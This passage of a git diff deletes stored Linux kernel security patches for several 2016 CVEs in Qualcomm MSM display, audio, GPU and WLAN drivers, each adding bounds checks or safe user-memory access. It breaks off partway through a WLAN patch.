@@ -1,173 +0,0 @@ -From 09dc4abecb0da388aedb37a57889c1ce2b267807 Mon Sep 17 00:00:00 2001 -From: Veera Sundaram Sankaran -Date: Tue, 15 Mar 2016 18:42:27 -0700 -Subject: msm: mdss: fix possible out-of-bounds and overflow issue in mdp - debugfs - -There are few cases where the count argument passed by the user -space is not validated, which can potentially lead to out of bounds -or overflow issues. In some cases, kernel might copy more data than -what is requested. Add necessary checks to avoid such cases. - -Change-Id: Ifa42fbd475665a0ca581c907ce5432584ea0e7ed -Signed-off-by: Veera Sundaram Sankaran ---- - drivers/video/msm/mdss/mdss_debug.c | 44 +++++++++++++++++++++---------------- - 1 file changed, 25 insertions(+), 19 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index 12415c2..1d214ca 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2009-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2009-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -109,10 +109,10 @@ static ssize_t panel_debug_base_offset_read(struct file *file, - return 0; /* the end */ - - len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -231,10 +231,11 @@ static ssize_t panel_debug_base_reg_read(struct file *file, - if (mdata->debug_inf.debug_enable_clock) - mdata->debug_inf.debug_enable_clock(0); - -- if (len < 0) -+ if (len < 0 || len >= sizeof(to_user_buf)) - return 0; - -- if (copy_to_user(user_buf, to_user_buf, len)) -+ if ((count < sizeof(to_user_buf)) -+ || copy_to_user(user_buf, to_user_buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -368,7 +369,7 @@ static ssize_t mdss_debug_base_offset_read(struct file *file, - { - struct mdss_debug_base *dbg = file->private_data; - int len = 0; -- char buf[24]; -+ char buf[24] = {'\0'}; - - if (!dbg) - return -ENODEV; -@@ -377,10 +378,10 @@ static ssize_t mdss_debug_base_offset_read(struct file *file, - return 0; /* the end */ - - len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -702,7 +703,7 @@ static ssize_t mdss_debug_factor_read(struct file *file, - { - struct mdss_fudge_factor *factor = file->private_data; - int len = 0; -- char buf[32]; -+ char buf[32] = {'\0'}; - - if (!factor) - return -ENODEV; -@@ -712,10 +713,10 @@ static ssize_t mdss_debug_factor_read(struct file *file, - - len = snprintf(buf, sizeof(buf), "%d/%d\n", - 
factor->numer, factor->denom); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -746,6 +747,8 @@ static ssize_t mdss_debug_perf_mode_write(struct file *file, - if (copy_from_user(buf, user_buf, count)) - return -EFAULT; - -+ buf[count] = 0; /* end of string */ -+ - if (sscanf(buf, "%d", &perf_mode) != 1) - return -EFAULT; - -@@ -766,7 +769,7 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file, - { - struct mdss_perf_tune *perf_tune = file->private_data; - int len = 0; -- char buf[40]; -+ char buf[40] = {'\0'}; - - if (!perf_tune) - return -ENODEV; -@@ -774,14 +777,12 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file, - if (*ppos) - return 0; /* the end */ - -- buf[count] = 0; -- - len = snprintf(buf, sizeof(buf), "min_mdp_clk %lu min_bus_vote %llu\n", - perf_tune->min_mdp_clk, perf_tune->min_bus_vote); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -801,7 +802,7 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file, - { - struct mdss_data_type *mdata = file->private_data; - int len = 0; -- char buf[40]; -+ char buf[40] = {'\0'}; - - if (!mdata) - return -ENODEV; -@@ -811,10 +812,10 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file, - - len = snprintf(buf, sizeof(buf), "%d\n", - !mdata->has_panic_ctrl); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -877,9 +878,14 @@ static ssize_t mdss_debug_perf_panic_write(struct file *file, - if (!mdata) - return -EFAULT; - -+ if (count >= sizeof(buf)) 
-+ return -EFAULT; -+ - if (copy_from_user(buf, user_buf, count)) - return -EFAULT; - -+ buf[count] = 0; /* end of string */ -+ - if (sscanf(buf, "%d", &disable_panic) != 1) - return -EFAULT; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch deleted file mode 100644 index 1af62167..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch +++ /dev/null 
@@ -1,178 +0,0 @@ -From 240f3bd82840fe6df7989339e465e9558f42fb85 Mon Sep 17 00:00:00 2001 -From: Veera Sundaram Sankaran -Date: Tue, 15 Mar 2016 18:42:27 -0700 -Subject: msm: mdss: fix possible out-of-bounds and overflow issue in mdp - debugfs - -There are few cases where the count argument passed by the user -space is not validated, which can potentially lead to out of bounds -or overflow issues. In some cases, kernel might copy more data than -what is requested. Add necessary checks to avoid such cases. - -Change-Id: Ifa42fbd475665a0ca581c907ce5432584ea0e7ed -[veeras@codeaurora.org: Resolve conflicts in mdss_debug.c] -Signed-off-by: Veera Sundaram Sankaran ---- - drivers/video/msm/mdss/mdss_debug.c | 47 +++++++++++++++++++++++-------------- - 1 file changed, 29 insertions(+), 18 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index e4749c5..09b0694 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -111,11 +111,11 @@ static ssize_t panel_debug_base_offset_read(struct file *file, - if (*ppos) - return 0; /* the end */ - -- len = snprintf(buf, sizeof(buf), "0x%02zx %zd\n", dbg->off, dbg->cnt); -- if (len < 0) -+ len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt); -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -244,7 +244,11 @@ static ssize_t panel_debug_base_reg_read(struct file *file, - if (mdata->debug_inf.debug_enable_clock) - mdata->debug_inf.debug_enable_clock(0); - -- if (copy_to_user(user_buf, panel_reg_buf, len)) -+ if (len < 0 || len >= sizeof(panel_reg_buf)) -+ return 0; -+ -+ if ((count < sizeof(panel_reg_buf)) -+ || (copy_to_user(user_buf, panel_reg_buf, len))) - goto read_reg_fail; - - kfree(rx_buf); -@@ -403,7 +407,7 @@ static ssize_t mdss_debug_base_offset_read(struct 
file *file, - { - struct mdss_debug_base *dbg = file->private_data; - int len = 0; -- char buf[24]; -+ char buf[24] = {'\0'}; - - if (!dbg) - return -ENODEV; -@@ -412,10 +416,10 @@ static ssize_t mdss_debug_base_offset_read(struct file *file, - return 0; /* the end */ - - len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -759,7 +763,7 @@ static ssize_t mdss_debug_factor_read(struct file *file, - { - struct mult_factor *factor = file->private_data; - int len = 0; -- char buf[32]; -+ char buf[32] = {'\0'}; - - if (!factor) - return -ENODEV; -@@ -769,10 +773,10 @@ static ssize_t mdss_debug_factor_read(struct file *file, - - len = snprintf(buf, sizeof(buf), "%d/%d\n", - factor->numer, factor->denom); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -803,6 +807,8 @@ static ssize_t mdss_debug_perf_mode_write(struct file *file, - if (copy_from_user(buf, user_buf, count)) - return -EFAULT; - -+ buf[count] = 0; /* end of string */ -+ - if (sscanf(buf, "%d", &perf_mode) != 1) - return -EFAULT; - -@@ -823,7 +829,7 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file, - { - struct mdss_perf_tune *perf_tune = file->private_data; - int len = 0; -- char buf[40]; -+ char buf[40] = {'\0'}; - - if (!perf_tune) - return -ENODEV; -@@ -833,10 +839,10 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file, - - len = snprintf(buf, sizeof(buf), "min_mdp_clk %lu min_bus_vote %llu\n", - perf_tune->min_mdp_clk, perf_tune->min_bus_vote); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count 
< sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -856,7 +862,7 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file, - { - struct mdss_data_type *mdata = file->private_data; - int len = 0; -- char buf[40]; -+ char buf[40] = {'\0'}; - - if (!mdata) - return -ENODEV; -@@ -866,10 +872,10 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file, - - len = snprintf(buf, sizeof(buf), "%d\n", - !mdata->has_panic_ctrl); -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ -@@ -932,9 +938,14 @@ static ssize_t mdss_debug_perf_panic_write(struct file *file, - if (!mdata) - return -EFAULT; - -+ if (count >= sizeof(buf)) -+ return -EFAULT; -+ - if (copy_from_user(buf, user_buf, count)) - return -EFAULT; - -+ buf[count] = 0; /* end of string */ -+ - if (sscanf(buf, "%d", &disable_panic) != 1) - return -EFAULT; - -@@ -1004,10 +1015,10 @@ static ssize_t mdss_debug_perf_bw_limit_read(struct file *file, - temp_settings++; - } - -- if (len < 0) -+ if (len < 0 || len >= sizeof(buf)) - return 0; - -- if (copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) - return -EFAULT; - - *ppos += len; /* increase offset */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch deleted file mode 100644 index db760d4d..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch +++ /dev/null 
@@ -1,48 +0,0 @@
-diff --git a/sound/soc/msm/qdsp6v2/q6adm.c b/sound/soc/msm/qdsp6v2/q6adm.c
-index 08caf51..14565cc 100644
---- a/sound/soc/msm/qdsp6v2/q6adm.c
-+++ b/sound/soc/msm/qdsp6v2/q6adm.c
-@@ -508,9 +508,18 @@
- rc = -EINVAL;
- goto adm_get_param_return;
- }
-- if (params_data) {
-+ if ((params_data) &&
-+ (ARRAY_SIZE(adm_get_parameters) > 0) &&
-+ (ARRAY_SIZE(adm_get_parameters) >= 1+adm_get_parameters[0]) &&
-+ (params_length/sizeof(int) >= adm_get_parameters[0])) {
- for (i = 0; i < adm_get_parameters[0]; i++)
- params_data[i] = adm_get_parameters[1+i];
-+ } else {
-+ pr_err("%s: Get param data not copied! get_param array size %zd, index %d, params array size %zd, index %d\n",
-+ __func__, ARRAY_SIZE(adm_get_parameters),
-+ (1+adm_get_parameters[0]),
-+ params_length/sizeof(int),
-+ adm_get_parameters[0]);
- }
- rc = 0;
- adm_get_param_return:
-@@ -799,17 +808,18 @@
- data->payload_size))
- break;
-
-- if (payload[0] == 0) {
-- if (data->payload_size >
-- (4 * sizeof(uint32_t))) {
-- adm_get_parameters[0] = payload[3];
-+ if ((payload[0] == 0) &&
-+ (data->payload_size > (4 * sizeof(*payload))) &&
-+ (data->payload_size/sizeof(*payload)-4 >= payload[3]) &&
-+ (ARRAY_SIZE(adm_get_parameters) > 0) &&
-+ (ARRAY_SIZE(adm_get_parameters)-1 >= payload[3])) {
-+ adm_get_parameters[0] = payload[3];
- pr_debug("GET_PP PARAM:received parameter length: 0x%x\n",
- adm_get_parameters[0]);
- /* storing param size then params */
- for (i = 0; i < payload[3]; i++)
- adm_get_parameters[1+i] =
- payload[4+i];
-- }
- } else {
- adm_get_parameters[0] = -1;
- pr_err("%s: GET_PP_PARAMS failed, setting size to %d\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64
deleted file mode 100644
index 63268956..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch
deleted file mode 100644
index cb3ed542..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@ -From 38b6131d78cecec5d970230aeee3cef485103d82 Mon Sep 17 00:00:00 2001 -From: Fred Oh -Date: Thu, 3 Oct 2013 20:03:38 -0700 -Subject: ASoC: msm: q6: check upper bounds when copy ac3 params - -Although AC3 maximum param size is fixed, better check upper bounds -when copy user data. It might cause overflow, possibly cause memory -corruption. - -Change-Id: Iaded762f774c608e48e685d92204fc7516aa3063 -Signed-off-by: Fred Oh ---- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 30 ++++++++++++++++++++++-------- - 1 file changed, 22 insertions(+), 8 deletions(-) - -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -index b630e4b..dcac1a0 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -@@ -51,6 +51,8 @@ - #define COMPRE_OUTPUT_METADATA_SIZE (sizeof(struct output_meta_data_st)) - #define COMPRESSED_LR_VOL_MAX_STEPS 0x20002000 - -+#define MAX_AC3_PARAM_SIZE (18*2*sizeof(int)) -+ - const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0, - COMPRESSED_LR_VOL_MAX_STEPS); - struct snd_msm { -@@ -973,19 +975,25 @@ static int msm_compr_ioctl(struct snd_pcm_substream *substream, - compr->codec = FORMAT_MPEG4_AAC; - break; - case SND_AUDIOCODEC_AC3: { -- char params_value[18*2*sizeof(int)]; -+ char params_value[MAX_AC3_PARAM_SIZE]; - int *params_value_data = (int *)params_value; - /* 36 is the max param length for ddp */ - int i; - struct snd_dec_ddp *ddp = - &compr->info.codec_param.codec.options.ddp; -- int params_length = ddp->params_length*sizeof(int); -+ uint32_t params_length = ddp->params_length*sizeof(int); -+ if (params_length > MAX_AC3_PARAM_SIZE) { -+ /*MAX is 36*sizeof(int) this should not happen*/ -+ pr_err("params_length(%d) is greater than %d", -+ params_length, MAX_AC3_PARAM_SIZE); -+ params_length = MAX_AC3_PARAM_SIZE; -+ } - pr_debug("SND_AUDIOCODEC_AC3\n"); - compr->codec = FORMAT_AC3; - if (copy_from_user(params_value, (void *)ddp->params, - params_length)) -- 
pr_err("%s: ERROR: copy ddp params value\n", -- __func__); -+ pr_err("%s: copy ddp params value, size=%d\n", -+ __func__, params_length); - pr_debug("params_length: %d\n", ddp->params_length); - for (i = 0; i < params_length; i++) - pr_debug("params_value[%d]: %x\n", i, -@@ -1004,19 +1012,25 @@ static int msm_compr_ioctl(struct snd_pcm_substream *substream, - break; - } - case SND_AUDIOCODEC_EAC3: { -- char params_value[18*2*sizeof(int)]; -+ char params_value[MAX_AC3_PARAM_SIZE]; - int *params_value_data = (int *)params_value; - /* 36 is the max param length for ddp */ - int i; - struct snd_dec_ddp *ddp = - &compr->info.codec_param.codec.options.ddp; -- int params_length = ddp->params_length*sizeof(int); -+ uint32_t params_length = ddp->params_length*sizeof(int); -+ if (params_length > MAX_AC3_PARAM_SIZE) { -+ /*MAX is 36*sizeof(int) this should not happen*/ -+ pr_err("params_length(%d) is greater than %d", -+ params_length, MAX_AC3_PARAM_SIZE); -+ params_length = MAX_AC3_PARAM_SIZE; -+ } - pr_debug("SND_AUDIOCODEC_EAC3\n"); - compr->codec = FORMAT_EAC3; - if (copy_from_user(params_value, (void *)ddp->params, - params_length)) -- pr_err("%s: ERROR: copy ddp params value\n", -- __func__); -+ pr_err("%s: copy ddp params value, size=%d\n", -+ __func__, params_length); - pr_debug("params_length: %d\n", ddp->params_length); - for (i = 0; i < ddp->params_length; i++) - pr_debug("params_value[%d]: %x\n", i, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch deleted file mode 100644 index 71ec1f27..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch +++ /dev/null 
@@ -1,44 +0,0 @@
-From b5eb67744215b3434a36b9251e28da3dc2a638a6 Mon Sep 17 00:00:00 2001
-From: Rajesh Kemisetti
-Date: Mon, 9 May 2016 22:12:20 +0530
-Subject: msm: kgsl: Add missing checks for alloc size and sglen
-
-In _kgsl_sharedmem_page_alloc(), check for boundary limits
-of requested alloc size before honoring and make sure sglen
-is greater than zero before marking it as end of sg list.
-
-Change-Id: I8b9e225e515a0f31593df6f4cad253236475d0ae
-Signed-off-by: Rajesh Kemisetti
----
- drivers/gpu/msm/kgsl_sharedmem.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c
-index 079b9ff..98f634d 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.c
-+++ b/drivers/gpu/msm/kgsl_sharedmem.c
-@@ -609,6 +609,10 @@ _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
- unsigned int align;
- int step = ((VMALLOC_END - VMALLOC_START)/8) >> PAGE_SHIFT;
-
-+ size = PAGE_ALIGN(size);
-+ if (size == 0 || size > UINT_MAX)
-+ return -EINVAL;
-+
- align = (memdesc->flags & KGSL_MEMALIGN_MASK) >> KGSL_MEMALIGN_SHIFT;
-
- page_size = get_page_size(size, align);
-@@ -712,7 +716,9 @@ _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
-
- memdesc->sglen = sglen;
- memdesc->size = size;
-- sg_mark_end(&memdesc->sg[sglen - 1]);
-+
-+ if (sglen > 0)
-+ sg_mark_end(&memdesc->sg[sglen - 1]);
-
- /*
- * All memory that goes to the user has to be zeroed out before it gets
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch
deleted file mode 100644
index 43295fd3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c
-index 29f6162..a138719 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.c
-+++ b/drivers/gpu/msm/kgsl_sharedmem.c
-@@ -592,13 +592,18 @@
- size_t size)
- {
- int pcount = 0, order, ret = 0;
-- int j, len, page_size, sglen_alloc, sglen = 0;
-+ int j, page_size, sglen_alloc, sglen = 0;
- struct page **pages = NULL;
- pgprot_t page_prot = pgprot_writecombine(PAGE_KERNEL);
- void *ptr;
-+ size_t len;
- unsigned int align;
- int step = SZ_2M >> PAGE_SHIFT;
-
-+ size = PAGE_ALIGN(size);
-+ if (size == 0 || size > UINT_MAX)
-+ return -EINVAL;
-+
- align = (memdesc->flags & KGSL_MEMALIGN_MASK) >> KGSL_MEMALIGN_SHIFT;
-
- page_size = (align >= ilog2(SZ_64K) && size >= SZ_64K)
diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64
deleted file mode 100644
index c51413b5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch
deleted file mode 100644
index 1aa84540..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@ -From e7369163162e7773bc887f7a264d6aa46cfcc665 Mon Sep 17 00:00:00 2001 -From: Patrick Daly -Date: Thu, 28 May 2015 18:05:54 -0700 -Subject: ASoC: msm: qdsp6v2: DAP: Fix unprotected userspace access - -Use get_user() & friends to access userspace addresses. - -Change-Id: I9741a60e53f6253da27913175e9b8c4abbf50db9 -Signed-off-by: Patrick Daly -Signed-off-by: Pradnya Chaphekar ---- - sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 21 ++++++++++++--------- - 1 file changed, 12 insertions(+), 9 deletions(-) - -diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -index 67a9400..7761b9c 100644 ---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c -@@ -1354,11 +1354,13 @@ end: - static int msm_ds2_dap_handle_commands(u32 cmd, void *arg) - { - int ret = 0, port_id = 0; -+ int32_t data; - struct dolby_param_data *dolby_data = (struct dolby_param_data *)arg; -+ get_user(data, &dolby_data->data[0]); - - pr_debug("%s: param_id %d,be_id %d,device_id 0x%x,length %d,data %d\n", - __func__, dolby_data->param_id, dolby_data->be_id, -- dolby_data->device_id, dolby_data->length, dolby_data->data[0]); -+ dolby_data->device_id, dolby_data->length, data); - - switch (dolby_data->param_id) { - case DAP_CMD_COMMIT_ALL: -@@ -1370,18 +1372,18 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg) - break; - - case DAP_CMD_USE_CACHE_FOR_INIT: -- ds2_dap_params_states.use_cache = dolby_data->data[0]; -+ ds2_dap_params_states.use_cache = data; - break; - - case DAP_CMD_SET_BYPASS: - pr_debug("%s: bypass %d bypass type %d, data %d\n", __func__, - ds2_dap_params_states.dap_bypass, - ds2_dap_params_states.dap_bypass_type, -- dolby_data->data[0]); -+ data); - /* Do not perform bypass operation if bypass state is same*/ -- if (ds2_dap_params_states.dap_bypass == dolby_data->data[0]) -+ if (ds2_dap_params_states.dap_bypass == data) - break; -- ds2_dap_params_states.dap_bypass = 
dolby_data->data[0]; -+ ds2_dap_params_states.dap_bypass = data; - /* hard bypass */ - if (ds2_dap_params_states.dap_bypass_type == DAP_HARD_BYPASS) - msm_ds2_dap_handle_bypass(dolby_data); -@@ -1390,7 +1392,7 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg) - break; - - case DAP_CMD_SET_BYPASS_TYPE: -- if (dolby_data->data[0] == true) -+ if (data == true) - ds2_dap_params_states.dap_bypass_type = - DAP_HARD_BYPASS; - else -@@ -1429,6 +1431,7 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg) - { - int rc = 0, idx, i, j, off, port_id = 0, cdev = 0; - int32_t num_device = 0; -+ int32_t data = 0; - int32_t dev_arr[DS2_DSP_SUPPORTED_ENDP_DEVICE] = {0}; - struct dolby_param_data *dolby_data = (struct dolby_param_data *)arg; - -@@ -1472,10 +1475,10 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg) - ds2_dap_params[cdev].dap_params_modified[idx] += 1; - for (j = 0; j < dolby_data->length; j++) { - off = ds2_dap_params_offset[idx]; -- ds2_dap_params[cdev].params_val[off + j] = -- dolby_data->data[j]; -+ get_user(data, &dolby_data->data[j]); -+ ds2_dap_params[cdev].params_val[off + j] = data; - pr_debug("%s:off %d,val[i/p:o/p]-[%d / %d]\n", -- __func__, off, dolby_data->data[j], -+ __func__, off, data, - ds2_dap_params[cdev]. - params_val[off + j]); - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch deleted file mode 100644 index cb6541fe..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch +++ /dev/null 
@@ -1,67 +0,0 @@
-From 7eb824e8e1ebbdbfad896b090a9f048ca6e63c9e Mon Sep 17 00:00:00 2001
-From: Ashish Jain
-Date: Fri, 15 Apr 2016 15:33:14 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Fix buffer overflow
-
-Add check to avoid out of bound access.
-Check return value of get_user api.
-
-CRs-Fixed: 997025
-Change-Id: Ibbace116ac206007fa1928555838285304737737
-Signed-off-by: Ashish Jain
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 24 ++++++++++++++++++++----
- 1 file changed, 20 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 242dc5f..ace747d 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1356,7 +1356,11 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg)
- int ret = 0, port_id = 0;
- int32_t data;
- struct dolby_param_data *dolby_data = (struct dolby_param_data *)arg;
-- get_user(data, &dolby_data->data[0]);
-+ if (get_user(data, &dolby_data->data[0])) {
-+ pr_debug("%s error getting data\n", __func__);
-+ ret = -EFAULT;
-+ goto end;
-+ }
-
- pr_debug("%s: param_id %d,be_id %d,device_id 0x%x,length %d,data %d\n",
- __func__, dolby_data->param_id, dolby_data->be_id,
-@@ -1471,11 +1475,23 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg)
- goto end;
- }
-
-+ off = ds2_dap_params_offset[idx];
-+ if ((dolby_data->length <= 0) ||
-+ (dolby_data->length > TOTAL_LENGTH_DS2_PARAM - off)) {
-+ pr_err("%s: invalid length %d at idx %d\n",
-+ __func__, dolby_data->length, idx);
-+ rc = -EINVAL;
-+ goto end;
-+ }
-+
- /* cache the parameters */
- ds2_dap_params[cdev].dap_params_modified[idx] += 1;
- for (j = 0; j < dolby_data->length; j++) {
-- off = ds2_dap_params_offset[idx];
-- get_user(data, &dolby_data->data[j]);
-+ if (get_user(data, &dolby_data->data[j])) {
-+ pr_debug("%s:error getting data\n", __func__);
-+ rc = -EFAULT;
-+ goto end;
-+ }
- ds2_dap_params[cdev].params_val[off + j] = data;
- pr_debug("%s:off %d,val[i/p:o/p]-[%d / %d]\n",
- __func__, off, data,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch
deleted file mode 100644
index 97a04077..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch
+++ /dev/null
@@ -1,303 +0,0 @@ -From 05ce237387c6e1d101bbb4b825e56757576748e6 Mon Sep 17 00:00:00 2001 -From: Arif Hussain -Date: Mon, 11 Nov 2013 22:59:34 -0800 -Subject: wlan: wlan_hdd_wext Userspace data copy fix - -Use copy_to_user and copy_from_user for -copying data to/from user space. - -Change-Id: I98fb6352b654af8f78160738e7ccd902c3c70031 -CRs-Fixed: 561028 ---- - CORE/HDD/src/wlan_hdd_wext.c | 75 +++++++++++++++++++++++++------------------- - 1 file changed, 42 insertions(+), 33 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index c5247d3..6d60f14 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -1385,7 +1385,7 @@ static int iw_set_genie(struct net_device *dev, - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); - hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter); -- u_int8_t 